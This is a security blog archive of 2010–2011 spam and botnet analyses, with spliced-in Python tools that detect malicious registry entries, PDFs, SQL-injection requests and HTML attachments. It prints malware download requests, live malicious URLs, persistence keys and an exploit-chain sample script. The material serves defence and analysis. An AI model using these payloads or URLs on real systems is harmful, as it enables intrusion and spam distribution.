Posts Tagged ‘Spambot’


An analysis of the ACH spam campaign

By Rodel Mendrez  •  September 6th, 2011  •   Malware Spam

Recently, we have seen a resurgence of malicious spam campaigns using an “ACH” theme. The Automated Clearing House (ACH) is an electronic network for financial transactions in the United States overseen by NACHA. Last week, we came across a suspicious-looking spam campaign with the unusual subject line “UAE Central Bank Warning: Email scam alert”. After closer investigation, we determined that it was indeed a fake ACH notification. The message contained an attached malicious file using the filename “document.zip”. As suspected, the malicious file attachment was a downloader that we have seen a lot of lately – Chepvil.

ACH spam campaign from the Donbot botnet

 

The Chepvil downloader, unsurprisingly, proceeded to retrieve more than just one piece of additional malware. First was the password stealing malware, Zbot, which was obtained from the domain name rattsillis[dot]com using a standard HTTP request, downloading the file “s.exe” – a Zbot variant.

GET /s.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: rattsillis.com
Cache-Control: no-cache

The file “s.exe” is executed immediately after being downloaded and drops the following files in the infected system:

C:\Documents and Settings\{USER}\Application Data\Ahob\paygi.ujl – encrypted configuration file

C:\Documents and Settings\{USER}\Application Data\Ahob\paygi.ujl.0 – encrypted configuration file

C:\Documents and Settings\{USER}\Application Data\Iqkohi\lady.exe – dropped copy of Zbot itself

C:\Documents and Settings\{USER}\Application Data\Microsoft\Address Book\Administrator.wab – an empty Windows address book.

Zbot then attempted to connect to a randomly generated domain to contact its command and control server.

The second piece of malware that Chepvil downloaded was a proxy-based spambot, an executable file “22.exe” from the same domain rattsillis[dot]com.

GET /22.exe HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rattsillis.com
Cache-Control: no-cache 

The file “22.exe” was interesting because we had not encountered it before. It was detected by 22 out of 45 antivirus programs with various generic detection names, although some identified it as Trojan.Scar.eaml. Upon execution, the proxy spambot drops a copy of itself in the Windows TEMP folder as svchost.exe, with a file size of around 10kb.

C:\Documents and Settings\{user}\Local Settings\Temp\svchost.exe

It also drops another copy of itself in the Application Data folder using the filename format: KB{6 random number}.exe.

C:\Documents and Settings\{user}\Application Data\KB117188.exe

Then the malware adds an autorun registry key to ensure that it will survive on Windows start up.

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

KB117188.exe = "C:\Documents and Settings\{user}\Application Data\KB117188.exe"

After installation, the parent spambot process executes the file Svchost.exe it dropped in the Windows TEMP folder and exits itself.
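The persistence artifacts just described (a Run value named KB{6 digits}.exe pointing into Application Data, and svchost.exe in the user's Temp folder) can be checked offline on a collected triage bundle. This is an added example, not code from the post: it parses a text export of the HKCU Run key, applies patterns written from the description above, and the sample registry export and file list are constructed.

```python
import re

# Indicators taken from the behaviour described above; the patterns and the .reg parser are
# my own, not code from the post. Input is a text export of the user's Run key plus a list
# of file paths, so the check runs offline on a collected triage bundle.
RUN_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
REG_LINE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')
RUN_NAME_RE = re.compile(r"^KB\d{6}\.exe$", re.I)                       # KB{6 digits}.exe
APPDATA_KB_RE = re.compile(r"\\Application Data\\KB\d{6}\.exe$", re.I)
TEMP_SVCHOST_RE = re.compile(r"\\Local Settings\\Temp\\svchost\.exe$", re.I)

def _unescape(s):
    return re.sub(r"\\(.)", r"\1", s)          # .reg escaping: \\ -> \ and \" -> "

def parse_run_values(reg_text):
    """Return {value name: command} from the HKCU Run section of a .reg export."""
    values, in_run = {}, False
    for line in reg_text.splitlines():
        line = line.strip()
        if line.startswith("["):
            in_run = line.strip("[]").lower() == RUN_KEY.lower()
            continue
        m = REG_LINE_RE.match(line) if in_run else None
        if m:
            values[_unescape(m.group(1))] = _unescape(m.group(2))
    return values

def suspicious_run_values(values):
    """Flag Run entries whose name or target matches the spambot's persistence pattern."""
    hits = []
    for name, command in values.items():
        path = command.strip().strip('"')       # the post shows the target path in quotes
        if RUN_NAME_RE.match(name) or APPDATA_KB_RE.search(path):
            hits.append((name, path))
    return hits

def suspicious_files(paths):
    """Flag svchost.exe outside the system directory and KB{6 digits}.exe in Application Data."""
    return [p for p in paths if TEMP_SVCHOST_RE.search(p) or APPDATA_KB_RE.search(p)]

# Constructed sample input (not real registry data).
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"
"KB117188.exe"="\"C:\\Documents and Settings\\user\\Application Data\\KB117188.exe\""
"""
SAMPLE_FILES = [
    r"C:\WINDOWS\system32\svchost.exe",    # legitimate location, must not be flagged
    r"C:\Documents and Settings\user\Local Settings\Temp\svchost.exe",
    r"C:\Documents and Settings\user\Application Data\KB117188.exe",
]

if __name__ == "__main__":
    print(suspicious_run_values(parse_run_values(SAMPLE_REG)))
    print(suspicious_files(SAMPLE_FILES))
```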

Instead of listening on a specific port and waiting, the proxy spambot attempts to connect to a control server by performing a standard DNS A query for the domain name luis-vuitton-elite[dot]com. However, if that fails, the bot attempts to connect to a randomly generated domain name.

 

The malware code that attempts to connect to the control server

 

Once connected, the proxy spambot initializes port 1001 where it sends and receives packets of data from the control server.

Exchange of data between the control server and the spambot

 

Meanwhile at port 1002, the spambot receives the actual spam data from the control server and relays this data to the final recipients. This simple proxy can relay spam at a rate of up to 1000 messages per hour.

Spam is received by the spambot from the control server and relayed to the recipients.

 

The command and control server’s IP address is based in Germany:

WHOIS information about the control server

 

This spambot’s recent spamming activities include both pharmaceutical campaigns and further ACH campaigns that appear to come from NACHA.org, and are very similar to the one which led to this infection in the first place.

Sample spam email from the Proxy-based spambot

In conclusion, there is not much that is new in this sequence of events: a spammed-out trojan downloader triggers the execution of multiple pieces of malware on the host, including the obligatory data stealer and a spambot to further propagate the nastiness. As we always say, there is no patch for social engineering, and the best way to protect yourself is to be cautious.


New Bots, Old Bots: Xarvester Returns

By Phil Hay  •  May 24th, 2011  •   Botnets

There has been quite a shake up in the spamming underworld ever since SpamIt.com closed shop and the Rustock botnet was disrupted. A look at our weekly spam statistics shows that spam volume has dropped substantially, making this year (so far) a happy one for anti-spammers. While spam output has remained low, the statistics also show quite a shakeup in the bots used to distribute spam.

Surprisingly, since around March, we have observed a big rise in spam from two botnets well known to us from the past – Donbot and Xarvester.  Six months ago, spam from these botnets hardly got our attention.  But now, clearly, someone has breathed new life into these spamming machines.

Xarvester first came to our attention over two years ago, when it rose to prominence after the hosting provider McColo was unplugged, decimating the then-leading spamming botnet Srizbi. We have also seen Xarvester clearly linked to Spamit.com, when we discovered Spamit ‘footprints’ in Xarvester spam templates. So when we recently came across a Xarvester bot, we decided to take a closer look. The sample we used is not named Xarvester by any anti-virus vendor: Microsoft were calling it Bymot, and AVG called it simply SpamTool (VirusTotal Report). A look at the strings in the malware body confirmed to us that what we were looking at was indeed Xarvester, as we had seen these strings in previous Xarvester bots.

Both the highlighted command and control domains are hard coded into the malware, and both point to the same IP address.

The spambot itself is relatively simple.  When the executable is run, it first performs a query to checkip.dyndns.com to check the IP address of the host. The bot then connects to the def2010cnt[dot]biz domain on port 12309, and requests an encrypted file, which, when decrypted, proves to be a container for a bunch of files the bot needs to spam.

Again, this is very similar to what we saw with Xarvester over two years ago. The bot typically does not perform DNS lookups for each spam message; instead, the IP addresses for the target domains are downloaded in the package. The headers of the spam messages are very uniform, and closer inspection shows that the bulk of the header is hard coded in the malware body, which is unusual compared to many of the other bots we see today, which vary headers regularly. Even the content of the message body has a familiar look to it. Compare the message body today:

With a message we saw from Xarvester two years ago:

 

So, Xarvester has been dusted off and is back to flogging replica watches – who would have thought?

We have updated our spambot description for Xarvester, which you can find here.

Thanks to Gavin Neale and Rodel Mendrez who contributed to the analysis of this bot.


Your Music Order – a loaded PDF

By Phil Hay  •  March 31st, 2011  •   Spam

We are noticing a spam campaign at the moment that purports to be a Music or Cell Phone “Order” with an attached PDF file with the following similar Subject lines:

  • Your Order No 129589 – Warner Music Inc.
  • Your Order No 489889 – Cell Phone Inc.

The attached PDF contains a bunch of obfuscated JavaScript, which attempts to exploit the Adobe getIcon vulnerability (CVE-2009-0927).  If successful, the following payload is downloaded:

hxxp://kawabungashop.ru/flash/1.php

The 1.php file is an executable downloader (VirusTotal Report).  Another piece of malware is then downloaded and installed (VirusTotal Report), which is a spambot that proceeds to spam further copies of the PDF file, as you can see from the template we captured:

These days, PDF files arriving in unexpected emails should be treated with extreme suspicion.  And please be sure to keep your PDF reader meticulously up to date to avoid getting exploited by old vulnerabilities such as this.
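A mail gateway or analyst can triage a PDF attachment for the features described above before anyone opens it: JavaScript actions in the document and, inside the decoded streams, a reference to getIcon (the call abused by CVE-2009-0927). This is an added example, not the post's or Adobe's code; the detection patterns are my own and the sample PDF is constructed to exercise the scanner, not an exploit.

```python
import re
import zlib

# Triage a PDF attachment the way a mail gateway might: find JavaScript actions, decode the
# streams, and look for the API the post names as exploited (getIcon, CVE-2009-0927) plus
# generic exploit-script markers. The patterns are my own; the sample PDF is constructed.
ACTION_NAMES = (b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/Launch")
SCRIPT_MARKERS = (b"getIcon", b"unescape(", b"eval(")
NAME_ESCAPE_RE = re.compile(rb"#([0-9A-Fa-f]{2})")
STREAM_START_RE = re.compile(rb"(?<!end)stream\r?\n")
LENGTH_RE = re.compile(rb"/Length\s+(\d+)(?!\s+\d+\s+R)")   # direct integer lengths only

def normalise_names(text):
    """Undo #xx escapes so an obfuscated /J#53 reads as /JS (apply to dictionaries, not streams)."""
    return NAME_ESCAPE_RE.sub(lambda m: bytes([int(m.group(1), 16)]), text)

def iter_streams(data):
    """Yield (object dictionary text, raw stream bytes) for every stream in the file."""
    pos = 0
    while True:
        m = STREAM_START_RE.search(data, pos)
        if not m:
            return
        head = normalise_names(data[max(data.rfind(b" obj", 0, m.start()), 0):m.start()])
        lm = LENGTH_RE.search(head)
        start = m.end()
        end = start + int(lm.group(1)) if lm else data.find(b"endstream", start)
        end = min(end, len(data)) if end >= start else len(data)
        yield head, data[start:end]
        pos = max(end, start + 1)

def decode_stream(head, body):
    if b"/FlateDecode" in head:
        try:
            return zlib.decompress(body)
        except zlib.error:
            pass                                   # malformed: inspect the raw bytes instead
    return body

def scan_pdf(data):
    names_view = normalise_names(data)             # used for name matching only
    report = {"actions": [n.decode() for n in ACTION_NAMES if n in names_view], "markers": []}
    for head, body in iter_streams(data):
        text = decode_stream(head, body)
        for marker in SCRIPT_MARKERS:
            if marker in text and marker.decode() not in report["markers"]:
                report["markers"].append(marker.decode())
    report["has_javascript"] = any(a in report["actions"] for a in ("/JavaScript", "/JS"))
    report["has_exploit_markers"] = bool(report["markers"])
    return report

def build_sample_pdf(script, obfuscate_names=False):
    """Constructed sample: a one-page PDF whose OpenAction runs a Flate-compressed script (not an exploit)."""
    body = zlib.compress(script)
    pdf = (b"%PDF-1.4\n"
           b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n"
           b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
           b"3 0 obj << /Type /Page /Parent 2 0 R >> endobj\n"
           b"4 0 obj << /S /JavaScript /JS 5 0 R >> endobj\n"
           b"5 0 obj << /Length " + str(len(body)).encode() + b" /Filter /FlateDecode >>\n"
           b"stream\n" + body + b"\nendstream\nendobj\ntrailer << /Root 1 0 R >>\n%%EOF\n")
    if obfuscate_names:
        pdf = pdf.replace(b"/JavaScript", b"/Java#53cript").replace(b"/JS ", b"/J#53 ")
    return pdf
```

Any PDF from an unexpected e-mail that reports has_javascript deserves quarantine on its own; has_exploit_markers is the stronger signal that it is carrying an exploit like the one in this campaign.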


Rustock down?

By Phil Hay  •  March 16th, 2011  •   Spam

A story emerged today on KrebsonSecurity about the Rustock botnet being disabled, and spam volumes from this rogue spammer plummeting.

A brief look at our spam traps today confirmed that output from Rustock did indeed dry up today. The chart below shows an index of daily spam volume changes from Rustock over the last few weeks:

 

Today, Rustock spam completely stopped (16 March, 3pm GMT). We can also confirm that the Rustock control servers that we know about are not responding. It is unclear yet who or what caused the shutdown. It’s also possible it has been abandoned. Over the past three years, Rustock has been responsible for a huge amount of spam, at times representing half of all spam caught in our spam traps. But since September last year, when Spamit.com was shut down, its output diminished significantly, and its spam templates hardly changed.

Whatever the reason, let’s hope this one sticks. Previous attempts at botnet shutdowns have tended to be short-lived, as the botnet herders simply regroup and start again. It’s too early to say bye bye Rustock, but the thought is certainly nice.

Update: According to a Wall Street Journal report here it looks like Microsoft, in conjunction with US Federal authorities, was responsible for the takedown of Rustock.


Mega-D Botnet Operator Revealed

By Phil Hay  •  December 2nd, 2010  •   Spam

Interesting details emerged today regarding the Mega-D botnet. The FBI has identified the Russian Oleg Nikolaenko as the operator of the botnet and has filed papers with a US District Court for his arrest. Brian Krebs from KrebsOnSecurity has a good article on the issue here, including a link to the court documents.

M86 Security Labs has monitored the Mega-D botnet closely ever since we noticed huge volumes of spam emanating from it in early 2008.  In fact we originally dubbed it Mega-D because of its numerous and distinctive “Megadik” spam campaigns at that time.  Mega-D has since had its ups and downs as various researchers and law enforcement authorities took ever greater interest in it. The timeline below shows the blog entries we have done on events relating to Mega-D over time.

The court document makes interesting reading.  The FBI found Nikolaenko through data revealed in the 2008 US Federal Trade Commission investigation into Affking, the affiliate program linked to Genbucks that was responsible for “Megadik” and other similar brands. M86 Security Labs provided assistance to the FTC and New Zealand authorities in this original investigation.  Between 6 June 2007 and 14 December 2007, payments totalling around $465,000 were made by Affking into an ePassporte account registered to Nikolaenko for the services of spamming.

Over the last few months, Mega-D spam activity has dried up and its control servers have become non-responsive. It no longer features in our spam tracking statistics. In reality, Mega-D has been on the decline for some time, probably as a result of all the interest by researchers and the authorities.

It’s encouraging to see law enforcement agencies going after these bot-herding criminals. Identifying and incapacitating the individuals behind the malware is one of the best ways to keep these giant spam-spewing systems in check.

Timeline:

Feb-2008: Spam from botnet “Mega-D” constituted 32% of spam, malware identified and control servers disabled

Feb-2008: Mega-D recovers and resumes spamming

October-2008: FTC initiates action against AffKing affiliate program

November-2008: McColo takedown halted operations on Mega-D and other spamming botnets

December-2008: Mega-D resumes spamming

November-2009: Mega-D operations disrupted by FireEye

February-2010: Mega-D resumes spamming…again

December-2010: FBI identifies Mega-D’s operator


FedEx Spam Seeding New Asprox Binary

By Rodel Mendrez  •  August 28th, 2010  •   Spam

Over the past few days, the Asprox botnet has been spamming out a fake FedEx campaign. We noticed this after we saw our old Asprox binaries downloading a new updated “196” version from the bot’s command and control server.

This Asprox update is responsible for spamming this week’s FedEx malicious spam campaign.


The attachment in this spam campaign is a downloader Trojan known by some AV products as Oficla or Sasfis. When run, the Trojan retrieves commands from its control server to download the Asprox spambot binary, which in turn sends this FedEx spam campaign. Below is a graphical overview of this campaign.

Asprox spam campaigns come and go. A couple of months ago we blogged about a spam campaign where the Asprox binary also launched an SQL injection attack targeting ASP websites. A month after, it stopped and the command and control servers were inaccessible. Now it’s back again using the same C&C domain and seeding a new binary. Since the Asprox bot is capable of updating itself on the infected host, our concern is that the next update may launch another round of SQL injection attacks.  We will certainly be monitoring it closely.


Pushdo Botnet Crippled

By Phil Hay  •  August 27th, 2010  •   Botnets

This morning we noticed that the usual torrent of spam from the Pushdo (or Cutwail) botnet had turned into a dribble.  The chart below shows an index of Pushdo spam volume over the month of August.

Pushdo Stats

So what’s the reason for this sudden decline? It turns out that the folks at TLLOD have been busy analyzing Pushdo command and control servers and coordinating their take down. According to their blog, over 30 Pushdo control servers were identified and 20 were taken down with the help of the relevant hosting providers. However, a few active control servers remain, still serving up spamming data.

As the chart above shows, this coordinated takedown has had an immediate impact on Pushdo’s spam output. This is welcome news indeed, especially as Pushdo has been responsible for wave after wave of malicious spam campaigns in recent months.  Still, we must sound a note of caution.  Previous experience has taught us that these botnet take downs are short lived.  Disabling control servers does not incapacitate the people behind the botnet.  It is highly likely they’ll be back before long with new control servers, and bots to do their spamming. In the meantime, we can enjoy a few days with less spam about.


Revisiting the King of Spam

By Rodel Mendrez  •  July 29th, 2010  •   Botnets

We keep a close eye on spam and the malware that drives spam production. Our recent report highlighted some of the worst offenders, and Rustock is without a doubt the leader of the pack. Over the last six months, the proportion of Rustock spam in our spam traps peaked to nearly 60% and it has never returned to levels lower than 20% of total spam.

Who’s the Rustock spambot that we know?

Over time, we have observed regular updates to Rustock. There is no consistent name given to it by anti-virus vendors, but recent Rustock binaries are detected by some anti-virus engines as Bubnix. The newest Rustock variant was first detected last December 2009. A month after that we observed a large influx of Rustock spam that spiked to over 50% of the spam we observed over the next few months. Though the malware may have different detection names and OS installation behavior, it employs a similar rootkit-based spamming engine, similar command and control architecture, and similar observable patterns in spam traffic.


Another round of Asprox SQL injection attacks

By Rodel Mendrez  •  June 23rd, 2010  •   Botnets

Earlier this month, we reported on a new variant of Asprox malware which was being spammed out by the Pushdo botnet. At that time, the Asprox executables we analyzed were purely sending spam. However, a few days after our post, we noticed reports of mass infections of IIS/ASP websites. The nature of these attacks reminded us of SQL injection attacks back in 2008 where Asprox was clearly involved. We suspected that the re-emergence of Asprox and these new mass website infections were not merely a coincidence. Well, this week our suspicions were confirmed when we came across another version of Asprox which started to launch both spam and SQL injection attacks.

As of this writing, there are three fast-flux domains that the bot attempts to contact.

CL63AMGSTART.RU
HYPERVMSYS.RU
ML63AMGSTART.RU

These domains resolve to Asprox’s control servers, which respond with spam templates, target email addresses, Asprox malware updates, as well as SQL injection attack information and lists of target ASP websites.

When analyzing the new Asprox binary that we pulled from the command and control server, we noticed some interesting clues that show that Asprox is behind the latest SQL injection attacks.

Figure 1: SQL statement in the Asprox malware body used to launch the SQL injection attack. As of this writing this malware had a poor detection rate.

The Asprox bot downloads an encrypted XML file that contains a list of target ASP websites and some other information such as a Google search term to search for more potential targets.

Figure 2: The decrypted XML file which the bot receives. Contains a list of information such as target websites.

When the Asprox bot launches an SQL injection attack, the initial request looks similar to this:

The SQL statement is passed to a target ASP website and executes a series of URL encoded SQL queries, which when decoded, look like this:

Enclosed in the SQL CAST function is another hexadecimal encoded string. Decoding it reveals a <script> tag that reveals malicious JavaScript code hosted on a remote site. The sub-domain part of this URL varies, so administrators should seek to block the domain:

Update:

We have seen new domains hosting the malicious JavaScript, although, as yet, the number of infected sites are not as numerous. Again, the sub-domain part varies.

http://manage[dot]webservicekuz[dot]ru/js.js
http://stream[dot]webservicesttt[dot]ru/js.js
http://media[dot]webservicefull[dot]ru/js.js
http://edit[dot]webservicezok[dot]ru/js.js
http://redir[dot]webserviceforward[dot]ru/js.js
http://shell[dot]webserviceget[dot]ru/js.js
http://rid[dot]webservicedevlop[dot]ru/js.js

The SQL attack queries the SQL Server system tables sysobjects and syscolumns in an attempt to enumerate the available “user” tables and fields in the website’s database. Walking through those tables and fields, the attack appends the malicious <script> tag to the selected values, in effect poisoning the website’s database. Once a web page uses a string from the poisoned database, the malicious <script> tag is injected into that web page. When we performed a Google search of this domain, we saw over 5000 websites infected:
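Web server logs are where a site owner first sees this attack, and the request has to be peeled in the order described above: URL encoding on the outside, a hex literal inside SQL CAST(), and the <script> tag inside that. This decoder is an added example, not Asprox's or the post's code; the detection patterns, the sample request and the .invalid hostname are constructed, and the system-table check is my own heuristic based on the sysobjects/syscolumns enumeration the post describes.

```python
import re
from urllib.parse import unquote_plus

# Peels the layers the post describes in an injection request: URL encoding on the outside,
# a hex literal inside SQL CAST(), and the <script> tag inside that. Patterns and the
# sample request are my own (constructed), not Asprox code.
CAST_HEX_RE = re.compile(r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+N?(?:VAR)?CHAR", re.I)
SCRIPT_SRC_RE = re.compile(r"<script[^>]*\ssrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)
SYSTEM_TABLE_RE = re.compile(r"\b(?:sysobjects|syscolumns)\b", re.I)

def decode_hex_payload(hexstr):
    """Decode a CAST() hex literal; NVARCHAR payloads are UTF-16LE, others single-byte."""
    raw = bytes.fromhex(hexstr)                 # raises ValueError on odd length / bad digits
    if len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")

def fully_url_decode(text, rounds=3):
    """Peel stacked URL encoding, stopping when a pass changes nothing."""
    for _ in range(rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text

def analyse_request(request_target):
    """request_target: the path?query part of a logged HTTP request."""
    decoded = fully_url_decode(request_target)
    report = {"payloads": [], "script_urls": [], "touches_system_tables": False}
    for m in CAST_HEX_RE.finditer(decoded):
        try:
            text = decode_hex_payload(m.group(1))
        except ValueError:
            continue
        report["payloads"].append(text)
        report["script_urls"] += SCRIPT_SRC_RE.findall(text)
    searched = decoded + "".join(report["payloads"])   # table names may hide in the hex layer
    report["touches_system_tables"] = bool(SYSTEM_TABLE_RE.search(searched))
    report["malicious"] = bool(report["script_urls"]) or (
        bool(report["payloads"]) and report["touches_system_tables"])
    return report

def build_sample_request(inner_text):
    """Constructed sample: wrap inner_text as a UTF-16LE hex literal in CAST() in a query string."""
    hexlit = inner_text.encode("utf-16-le").hex()
    return "/products.asp?id=1%3BCAST(0x" + hexlit + "%20AS%20NVARCHAR(4000))%3B--"

if __name__ == "__main__":
    sample = build_sample_request('<script src="http://sub.webservice-sample.invalid/js.js"></script>')
    print(analyse_request(sample))
```

Running it over an IIS log stream gives the script hostnames to block and the affected pages to clean, which is more useful than matching on the raw hex.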

So Asprox is back with a vengeance, and doing its typically Asprox-like things, namely spamming and SQL injection. Anyone have a feeling of déjà vu?


Pushdo uses World Cup Theme to Spread Malware

By Gavin Neale  •  June 15th, 2010  •   Malware

Over the last couple of days we have been seeing numerous malicious and Canadian Pharmacy spam campaigns sent from the Pushdo botnet. This campaign features an HTML file as an attachment and some subject lines, including one that mentions the FIFA World Cup, that may fool unwary recipients. Some of the email subjects we have seen are:

FIFA World Cup South Africa… bad news

[Recipient Domain] account Information

[Random Email Address] has sent you a birthday ecard.

Reset your Twitter password

The HTML file attachment contains the following JavaScript:

We have seen several different variations of this script but all have the same purpose which is concealed by some very basic obfuscation. If we remove the parts of this script that aren’t doing anything and clean up some of the text we get the script below:

If this attachment was opened in a browser with JavaScript enabled then the script will redirect the browser to the file z.htm (shown below) on one of several different web servers.

This page waits for three seconds and then redirects the browser to a Canadian Pharmacy website. While waiting, a hidden IFrame is loaded. We have removed some of the obfuscation to make the script in this IFrame more readable:

This script checks each of the browser’s plugins to see if any contain the words ‘Adobe Acrobat’ or ‘Adobe PDF’ in their name. This is looking for any Adobe PDF readers and if one is found, adds an IFrame to the page pointing to a malicious PDF file.

The script then checks if Java (that’s Sun Microsystems’ Java, not JavaScript) is enabled, and if so, adds an IFrame that exploits vulnerabilities in Java.

The exploits install an executable named game.exe, which we have not yet analyzed and which is not detected by many anti-virus products.
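The chain described in this post (timed redirect, hidden IFrame, a script that probes for Adobe PDF readers and Java and writes further IFrames) can be flagged statically before an HTML attachment ever reaches a browser. This triage tool is an added example, not code from the post or from the attachment itself; the checks are my own heuristics, and the sample HTML is constructed with .invalid placeholder hosts.

```python
import re
from html.parser import HTMLParser

# Static triage for an HTML mail attachment, keyed on the chain described above: a timed
# redirect, a hidden IFrame, and a script that probes for Adobe PDF readers and Java and
# writes further IFrames. The checks are my own; the sample HTML is constructed.
SCRIPT_CHECKS = {
    "probes_pdf_plugin": re.compile(r"navigator\.plugins|Adobe\s+(?:Acrobat|PDF)", re.I),
    "probes_java": re.compile(r"navigator\.javaEnabled\s*\(", re.I),
    "writes_iframe": re.compile(r"(?:document\.write|innerHTML)[^;]{0,40}<iframe", re.I),
    "decodes_strings": re.compile(r"unescape\s*\(|String\.fromCharCode|eval\s*\(", re.I),
}

class AttachmentParser(HTMLParser):
    """Collects inline <script> bodies plus <iframe> and <meta> attributes."""
    def __init__(self):
        super().__init__()
        self.scripts, self.iframes, self.metas = [], [], []
        self._in_script = False
    def handle_starttag(self, tag, attrs):
        attrs = {k: (v or "") for k, v in attrs}
        if tag == "script":
            self._in_script = True
        elif tag == "iframe":
            self.iframes.append(attrs)
        elif tag == "meta":
            self.metas.append(attrs)
    def handle_endtag(self, tag):
        self._in_script = self._in_script and tag != "script"
    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)

def _is_hidden(attrs):
    style = attrs.get("style", "").replace(" ", "").lower()
    return ("display:none" in style or "visibility:hidden" in style
            or attrs.get("width", "").rstrip("px") == "0" or attrs.get("height", "").rstrip("px") == "0")

def triage_html(html):
    """Return the indicators found and a verdict; two or more indicators is enough to quarantine."""
    p = AttachmentParser()
    p.feed(html)
    findings = [name for name, rx in SCRIPT_CHECKS.items() if rx.search("".join(p.scripts))]
    if any(_is_hidden(a) for a in p.iframes):
        findings.append("hidden_iframe")
    if any(m.get("http-equiv", "").lower() == "refresh" for m in p.metas):
        findings.append("meta_refresh")
    return {"findings": findings, "suspicious": len(findings) >= 2}

# Constructed sample mirroring the described chain; all hosts are .invalid placeholders.
SAMPLE_HTML = """<html><head><meta http-equiv="refresh" content="3;url=http://shop.example.invalid/">
</head><body>
<iframe src="http://landing.example.invalid/z.htm" width="0" height="0" style="display:none"></iframe>
<script>
var p = navigator.plugins, pdf = false;
for (var i = 0; i < p.length; i++)
  if (p[i].name.indexOf('Adobe Acrobat') >= 0 || p[i].name.indexOf('Adobe PDF') >= 0) pdf = true;
if (pdf) document.write('<iframe src="http://landing.example.invalid/doc.pdf"></iframe>');
if (navigator.javaEnabled()) document.write('<iframe src="http://landing.example.invalid/j.html"></iframe>');
</script></body></html>"""
```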
